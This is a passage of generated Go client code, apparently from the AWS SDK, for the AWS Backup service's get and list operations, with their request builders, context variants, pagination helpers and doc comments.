// req, resp := client.GetBackupSelectionRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupSelection
func (c *Backup) GetBackupSelectionRequest(input *GetBackupSelectionInput) (req *request.Request, output *GetBackupSelectionOutput) {
op := &request.Operation{
Name: opGetBackupSelection,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/selections/{selectionId}",
}
if input == nil {
input = &GetBackupSelectionInput{}
}
output = &GetBackupSelectionOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupSelection API operation for AWS Backup.
//
// Returns selection metadata and a document in JSON format that specifies a
// list of resources that are associated with a backup plan.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupSelection for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupSelection
func (c *Backup) GetBackupSelection(input *GetBackupSelectionInput) (*GetBackupSelectionOutput, error) {
req, out := c.GetBackupSelectionRequest(input)
return out, req.Send()
}
// GetBackupSelectionWithContext is the same as GetBackupSelection with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupSelection for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupSelectionWithContext(ctx aws.Context, input *GetBackupSelectionInput, opts ...request.Option) (*GetBackupSelectionOutput, error) {
req, out := c.GetBackupSelectionRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupVaultAccessPolicy = "GetBackupVaultAccessPolicy"
// GetBackupVaultAccessPolicyRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupVaultAccessPolicy operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupVaultAccessPolicy for more information on using the GetBackupVaultAccessPolicy
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupVaultAccessPolicyRequest method.
// req, resp := client.GetBackupVaultAccessPolicyRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultAccessPolicy
func (c *Backup) GetBackupVaultAccessPolicyRequest(input *GetBackupVaultAccessPolicyInput) (req *request.Request, output *GetBackupVaultAccessPolicyOutput) {
op := &request.Operation{
Name: opGetBackupVaultAccessPolicy,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/access-policy",
}
if input == nil {
input = &GetBackupVaultAccessPolicyInput{}
}
output = &GetBackupVaultAccessPolicyOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupVaultAccessPolicy API operation for AWS Backup.
//
// Returns the access policy document that is associated with the named backup
// vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupVaultAccessPolicy for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultAccessPolicy
func (c *Backup) GetBackupVaultAccessPolicy(input *GetBackupVaultAccessPolicyInput) (*GetBackupVaultAccessPolicyOutput, error) {
req, out := c.GetBackupVaultAccessPolicyRequest(input)
return out, req.Send()
}
// GetBackupVaultAccessPolicyWithContext is the same as GetBackupVaultAccessPolicy with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupVaultAccessPolicy for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupVaultAccessPolicyWithContext(ctx aws.Context, input *GetBackupVaultAccessPolicyInput, opts ...request.Option) (*GetBackupVaultAccessPolicyOutput, error) {
req, out := c.GetBackupVaultAccessPolicyRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetBackupVaultNotifications = "GetBackupVaultNotifications"
// GetBackupVaultNotificationsRequest generates a "aws/request.Request" representing the
// client's request for the GetBackupVaultNotifications operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetBackupVaultNotifications for more information on using the GetBackupVaultNotifications
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetBackupVaultNotificationsRequest method.
// req, resp := client.GetBackupVaultNotificationsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultNotifications
func (c *Backup) GetBackupVaultNotificationsRequest(input *GetBackupVaultNotificationsInput) (req *request.Request, output *GetBackupVaultNotificationsOutput) {
op := &request.Operation{
Name: opGetBackupVaultNotifications,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/notification-configuration",
}
if input == nil {
input = &GetBackupVaultNotificationsInput{}
}
output = &GetBackupVaultNotificationsOutput{}
req = c.newRequest(op, input, output)
return
}
// GetBackupVaultNotifications API operation for AWS Backup.
//
// Returns event notifications for the specified backup vault.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetBackupVaultNotifications for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetBackupVaultNotifications
func (c *Backup) GetBackupVaultNotifications(input *GetBackupVaultNotificationsInput) (*GetBackupVaultNotificationsOutput, error) {
req, out := c.GetBackupVaultNotificationsRequest(input)
return out, req.Send()
}
// GetBackupVaultNotificationsWithContext is the same as GetBackupVaultNotifications with the addition of
// the ability to pass a context and additional request options.
//
// See GetBackupVaultNotifications for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetBackupVaultNotificationsWithContext(ctx aws.Context, input *GetBackupVaultNotificationsInput, opts ...request.Option) (*GetBackupVaultNotificationsOutput, error) {
req, out := c.GetBackupVaultNotificationsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
const opGetRecoveryPointRestoreMetadata = "GetRecoveryPointRestoreMetadata"
// GetRecoveryPointRestoreMetadataRequest generates a "aws/request.Request" representing the
// client's request for the GetRecoveryPointRestoreMetadata operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetRecoveryPointRestoreMetadata for more information on using the GetRecoveryPointRestoreMetadata
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetRecoveryPointRestoreMetadataRequest method.
// req, resp := client.GetRecoveryPointRestoreMetadataRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetRecoveryPointRestoreMetadata
func (c *Backup) GetRecoveryPointRestoreMetadataRequest(input *GetRecoveryPointRestoreMetadataInput) (req *request.Request, output *GetRecoveryPointRestoreMetadataOutput) {
op := &request.Operation{
Name: opGetRecoveryPointRestoreMetadata,
HTTPMethod: "GET",
HTTPPath: "/backup-vaults/{backupVaultName}/recovery-points/{recoveryPointArn}/restore-metadata",
}
if input == nil {
input = &GetRecoveryPointRestoreMetadataInput{}
}
output = &GetRecoveryPointRestoreMetadataOutput{}
req = c.newRequest(op, input, output)
return
}
// GetRecoveryPointRestoreMetadata API operation for AWS Backup.
//
// Returns a set of metadata key-value pairs that were used to create the backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetRecoveryPointRestoreMetadata for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetRecoveryPointRestoreMetadata
func (c *Backup) GetRecoveryPointRestoreMetadata(input *GetRecoveryPointRestoreMetadataInput) (*GetRecoveryPointRestoreMetadataOutput, error) {
req, out := c.GetRecoveryPointRestoreMetadataRequest(input)
return out, req.Send()
}
// GetRecoveryPointRestoreMetadataWithContext is the same as GetRecoveryPointRestoreMetadata with the addition of
// the ability to pass a context and additional request options.
//
// See GetRecoveryPointRestoreMetadata for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetRecoveryPointRestoreMetadataWithContext(ctx aws.Context, input *GetRecoveryPointRestoreMetadataInput, opts ...request.Option) (*GetRecoveryPointRestoreMetadataOutput, error) {
req, out := c.GetRecoveryPointRestoreMetadataRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
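// Example (illustrative sketch, not generated reference documentation):
// printing the metadata key-value pairs of a recovery point. The identifiers
// and the RestoreMetadata field name are assumptions for illustration.
//
//    out, err := svc.GetRecoveryPointRestoreMetadata(&backup.GetRecoveryPointRestoreMetadataInput{
//        BackupVaultName:  aws.String("my-vault"),           // hypothetical vault
//        RecoveryPointArn: aws.String("arn:aws:backup:..."), // hypothetical ARN
//    })
//    if err == nil {
//        for k, v := range out.RestoreMetadata {
//            fmt.Printf("%s=%s\n", k, aws.StringValue(v))
//        }
//    }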
const opGetSupportedResourceTypes = "GetSupportedResourceTypes"
// GetSupportedResourceTypesRequest generates a "aws/request.Request" representing the
// client's request for the GetSupportedResourceTypes operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See GetSupportedResourceTypes for more information on using the GetSupportedResourceTypes
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the GetSupportedResourceTypesRequest method.
// req, resp := client.GetSupportedResourceTypesRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetSupportedResourceTypes
func (c *Backup) GetSupportedResourceTypesRequest(input *GetSupportedResourceTypesInput) (req *request.Request, output *GetSupportedResourceTypesOutput) {
op := &request.Operation{
Name: opGetSupportedResourceTypes,
HTTPMethod: "GET",
HTTPPath: "/supported-resource-types",
}
if input == nil {
input = &GetSupportedResourceTypesInput{}
}
output = &GetSupportedResourceTypesOutput{}
req = c.newRequest(op, input, output)
return
}
// GetSupportedResourceTypes API operation for AWS Backup.
//
// Returns the AWS resource types supported by AWS Backup.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation GetSupportedResourceTypes for usage and error information.
//
// Returned Error Types:
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/GetSupportedResourceTypes
func (c *Backup) GetSupportedResourceTypes(input *GetSupportedResourceTypesInput) (*GetSupportedResourceTypesOutput, error) {
req, out := c.GetSupportedResourceTypesRequest(input)
return out, req.Send()
}
// GetSupportedResourceTypesWithContext is the same as GetSupportedResourceTypes with the addition of
// the ability to pass a context and additional request options.
//
// See GetSupportedResourceTypes for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) GetSupportedResourceTypesWithContext(ctx aws.Context, input *GetSupportedResourceTypesInput, opts ...request.Option) (*GetSupportedResourceTypesOutput, error) {
req, out := c.GetSupportedResourceTypesRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
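// Example (illustrative sketch, not generated reference documentation):
// listing the resource types AWS Backup supports. The ResourceTypes field
// name is assumed here for illustration.
//
//    out, err := svc.GetSupportedResourceTypes(&backup.GetSupportedResourceTypesInput{})
//    if err == nil {
//        for _, t := range out.ResourceTypes {
//            fmt.Println(aws.StringValue(t))
//        }
//    }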
const opListBackupJobs = "ListBackupJobs"
// ListBackupJobsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupJobs operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupJobs for more information on using the ListBackupJobs
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle. Such as custom headers, or retry logic.
//
//
// // Example sending a request using the ListBackupJobsRequest method.
// req, resp := client.ListBackupJobsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupJobs
func (c *Backup) ListBackupJobsRequest(input *ListBackupJobsInput) (req *request.Request, output *ListBackupJobsOutput) {
op := &request.Operation{
Name: opListBackupJobs,
HTTPMethod: "GET",
HTTPPath: "/backup-jobs/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupJobsInput{}
}
output = &ListBackupJobsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupJobs API operation for AWS Backup.
//
// Returns a list of existing backup jobs for an authenticated account for the
// last 30 days. For a longer period of time, consider using these monitoring
// tools (https://docs.aws.amazon.com/aws-backup/latest/devguide/monitoring.html).
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupJobs for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupJobs
func (c *Backup) ListBackupJobs(input *ListBackupJobsInput) (*ListBackupJobsOutput, error) {
req, out := c.ListBackupJobsRequest(input)
return out, req.Send()
}
// ListBackupJobsWithContext is the same as ListBackupJobs with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupJobs for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupJobsWithContext(ctx aws.Context, input *ListBackupJobsInput, opts ...request.Option) (*ListBackupJobsOutput, error) {
req, out := c.ListBackupJobsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupJobsPages iterates over the pages of a ListBackupJobs operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupJobs method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupJobs operation.
// pageNum := 0
// err := client.ListBackupJobsPages(params,
// func(page *backup.ListBackupJobsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupJobsPages(input *ListBackupJobsInput, fn func(*ListBackupJobsOutput, bool) bool) error {
return c.ListBackupJobsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupJobsPagesWithContext is the same as ListBackupJobsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupJobsPagesWithContext(ctx aws.Context, input *ListBackupJobsInput, fn func(*ListBackupJobsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupJobsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupJobsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupJobsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
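// A sketch of bounded pagination over backup jobs, assuming an initialized
// *Backup client named svc and a context with a deadline; the 30-second
// timeout and the printed fields are illustrative choices.
//
//    ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second)
//    defer cancel()
//
//    err := svc.ListBackupJobsPagesWithContext(ctx, &backup.ListBackupJobsInput{},
//        func(page *backup.ListBackupJobsOutput, lastPage bool) bool {
//            for _, job := range page.BackupJobs {
//                fmt.Println(aws.StringValue(job.BackupJobId), aws.StringValue(job.State))
//            }
//            return true // keep paging until the service reports the last page
//        })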
const opListBackupPlanTemplates = "ListBackupPlanTemplates"
// ListBackupPlanTemplatesRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupPlanTemplates operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupPlanTemplates for more information on using the ListBackupPlanTemplates
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListBackupPlanTemplatesRequest method.
// req, resp := client.ListBackupPlanTemplatesRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanTemplates
func (c *Backup) ListBackupPlanTemplatesRequest(input *ListBackupPlanTemplatesInput) (req *request.Request, output *ListBackupPlanTemplatesOutput) {
op := &request.Operation{
Name: opListBackupPlanTemplates,
HTTPMethod: "GET",
HTTPPath: "/backup/template/plans",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupPlanTemplatesInput{}
}
output = &ListBackupPlanTemplatesOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupPlanTemplates API operation for AWS Backup.
//
// Returns metadata of your saved backup plan templates, including the template
// ID, name, and the creation and deletion dates.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupPlanTemplates for usage and error information.
//
// Returned Error Types:
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanTemplates
func (c *Backup) ListBackupPlanTemplates(input *ListBackupPlanTemplatesInput) (*ListBackupPlanTemplatesOutput, error) {
req, out := c.ListBackupPlanTemplatesRequest(input)
return out, req.Send()
}
// ListBackupPlanTemplatesWithContext is the same as ListBackupPlanTemplates with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupPlanTemplates for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanTemplatesWithContext(ctx aws.Context, input *ListBackupPlanTemplatesInput, opts ...request.Option) (*ListBackupPlanTemplatesOutput, error) {
req, out := c.ListBackupPlanTemplatesRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupPlanTemplatesPages iterates over the pages of a ListBackupPlanTemplates operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupPlanTemplates method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupPlanTemplates operation.
// pageNum := 0
// err := client.ListBackupPlanTemplatesPages(params,
// func(page *backup.ListBackupPlanTemplatesOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupPlanTemplatesPages(input *ListBackupPlanTemplatesInput, fn func(*ListBackupPlanTemplatesOutput, bool) bool) error {
return c.ListBackupPlanTemplatesPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupPlanTemplatesPagesWithContext is the same as ListBackupPlanTemplatesPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanTemplatesPagesWithContext(ctx aws.Context, input *ListBackupPlanTemplatesInput, fn func(*ListBackupPlanTemplatesOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupPlanTemplatesInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupPlanTemplatesRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupPlanTemplatesOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
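// A sketch that accumulates template names across pages; the slice handling
// is illustrative and svc is assumed to be an initialized client.
//
//    var names []string
//    err := svc.ListBackupPlanTemplatesPages(&backup.ListBackupPlanTemplatesInput{},
//        func(page *backup.ListBackupPlanTemplatesOutput, lastPage bool) bool {
//            for _, tmpl := range page.BackupPlanTemplatesList {
//                names = append(names, aws.StringValue(tmpl.BackupPlanTemplateName))
//            }
//            return true
//        })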
const opListBackupPlanVersions = "ListBackupPlanVersions"
// ListBackupPlanVersionsRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupPlanVersions operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupPlanVersions for more information on using the ListBackupPlanVersions
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListBackupPlanVersionsRequest method.
// req, resp := client.ListBackupPlanVersionsRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanVersions
func (c *Backup) ListBackupPlanVersionsRequest(input *ListBackupPlanVersionsInput) (req *request.Request, output *ListBackupPlanVersionsOutput) {
op := &request.Operation{
Name: opListBackupPlanVersions,
HTTPMethod: "GET",
HTTPPath: "/backup/plans/{backupPlanId}/versions/",
Paginator: &request.Paginator{
InputTokens: []string{"NextToken"},
OutputTokens: []string{"NextToken"},
LimitToken: "MaxResults",
TruncationToken: "",
},
}
if input == nil {
input = &ListBackupPlanVersionsInput{}
}
output = &ListBackupPlanVersionsOutput{}
req = c.newRequest(op, input, output)
return
}
// ListBackupPlanVersions API operation for AWS Backup.
//
// Returns version metadata of your backup plans, including Amazon Resource
// Names (ARNs), backup plan IDs, creation and deletion dates, plan names, and
// version IDs.
//
// Returns awserr.Error for service API and SDK errors. Use runtime type assertions
// with awserr.Error's Code and Message methods to get detailed information about
// the error.
//
// See the AWS API reference guide for AWS Backup's
// API operation ListBackupPlanVersions for usage and error information.
//
// Returned Error Types:
// * ResourceNotFoundException
// A resource that is required for the action doesn't exist.
//
// * InvalidParameterValueException
// Indicates that something is wrong with a parameter's value. For example,
// the value is out of range.
//
// * MissingParameterValueException
// Indicates that a required parameter is missing.
//
// * ServiceUnavailableException
// The request failed due to a temporary failure of the server.
//
// See also, https://docs.aws.amazon.com/goto/WebAPI/backup-2018-11-15/ListBackupPlanVersions
func (c *Backup) ListBackupPlanVersions(input *ListBackupPlanVersionsInput) (*ListBackupPlanVersionsOutput, error) {
req, out := c.ListBackupPlanVersionsRequest(input)
return out, req.Send()
}
// ListBackupPlanVersionsWithContext is the same as ListBackupPlanVersions with the addition of
// the ability to pass a context and additional request options.
//
// See ListBackupPlanVersions for details on how to use this API operation.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanVersionsWithContext(ctx aws.Context, input *ListBackupPlanVersionsInput, opts ...request.Option) (*ListBackupPlanVersionsOutput, error) {
req, out := c.ListBackupPlanVersionsRequest(input)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return out, req.Send()
}
// ListBackupPlanVersionsPages iterates over the pages of a ListBackupPlanVersions operation,
// calling the "fn" function with the response data for each page. To stop
// iterating, return false from the fn function.
//
// See ListBackupPlanVersions method for more information on how to use this operation.
//
// Note: This operation can generate multiple requests to a service.
//
// // Example iterating over at most 3 pages of a ListBackupPlanVersions operation.
// pageNum := 0
// err := client.ListBackupPlanVersionsPages(params,
// func(page *backup.ListBackupPlanVersionsOutput, lastPage bool) bool {
// pageNum++
// fmt.Println(page)
// return pageNum <= 3
// })
//
func (c *Backup) ListBackupPlanVersionsPages(input *ListBackupPlanVersionsInput, fn func(*ListBackupPlanVersionsOutput, bool) bool) error {
return c.ListBackupPlanVersionsPagesWithContext(aws.BackgroundContext(), input, fn)
}
// ListBackupPlanVersionsPagesWithContext is the same as ListBackupPlanVersionsPages except
// it takes a Context and allows setting request options on the pages.
//
// The context must be non-nil and will be used for request cancellation. If
// the context is nil a panic will occur. In the future the SDK may create
// sub-contexts for http.Requests. See https://golang.org/pkg/context/
// for more information on using Contexts.
func (c *Backup) ListBackupPlanVersionsPagesWithContext(ctx aws.Context, input *ListBackupPlanVersionsInput, fn func(*ListBackupPlanVersionsOutput, bool) bool, opts ...request.Option) error {
p := request.Pagination{
NewRequest: func() (*request.Request, error) {
var inCpy *ListBackupPlanVersionsInput
if input != nil {
tmp := *input
inCpy = &tmp
}
req, _ := c.ListBackupPlanVersionsRequest(inCpy)
req.SetContext(ctx)
req.ApplyOptions(opts...)
return req, nil
},
}
for p.Next() {
if !fn(p.Page().(*ListBackupPlanVersionsOutput), !p.HasNextPage()) {
break
}
}
return p.Err()
}
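// ListBackupPlanVersions is scoped to one plan, so BackupPlanId must be set
// on the input; a sketch with a placeholder plan ID.
//
//    input := &backup.ListBackupPlanVersionsInput{
//        BackupPlanId: aws.String("<backup-plan-id>"),
//    }
//    err := svc.ListBackupPlanVersionsPages(input,
//        func(page *backup.ListBackupPlanVersionsOutput, lastPage bool) bool {
//            for _, version := range page.BackupPlanVersionsList {
//                fmt.Println(aws.StringValue(version.VersionId))
//            }
//            return true
//        })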
const opListBackupPlans = "ListBackupPlans"
// ListBackupPlansRequest generates a "aws/request.Request" representing the
// client's request for the ListBackupPlans operation. The "output" return
// value will be populated with the request's response once the request completes
// successfully.
//
// Use "Send" method on the returned Request to send the API call to the service.
// the "output" return value is not valid until after Send returns without error.
//
// See ListBackupPlans for more information on using the ListBackupPlans
// API call, and error handling.
//
// This method is useful when you want to inject custom logic or configuration
// into the SDK's request lifecycle, such as custom headers or retry logic.
//
//
// // Example sending a request using the ListBackupPlansRequest method.
// req, resp := client.ListBackupPlansRequest(params)
//
// err := req.Send()
// if err == nil { // resp is now filled
// fmt.Println(resp)
// }
//
